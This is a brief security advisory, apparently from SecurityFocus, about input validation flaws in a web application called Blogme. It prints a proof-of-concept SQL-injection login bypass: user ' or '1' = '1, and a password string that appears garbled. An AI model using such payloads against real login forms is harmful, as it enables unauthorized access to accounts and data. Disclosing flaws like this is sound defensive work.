Blogme Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof of concept for the SQL-injection vulnerability is available:

user : ' or '1' = '1
passwd: 1'='1' ro '


 

Privacy Statement
Copyright 2010, SecurityFocus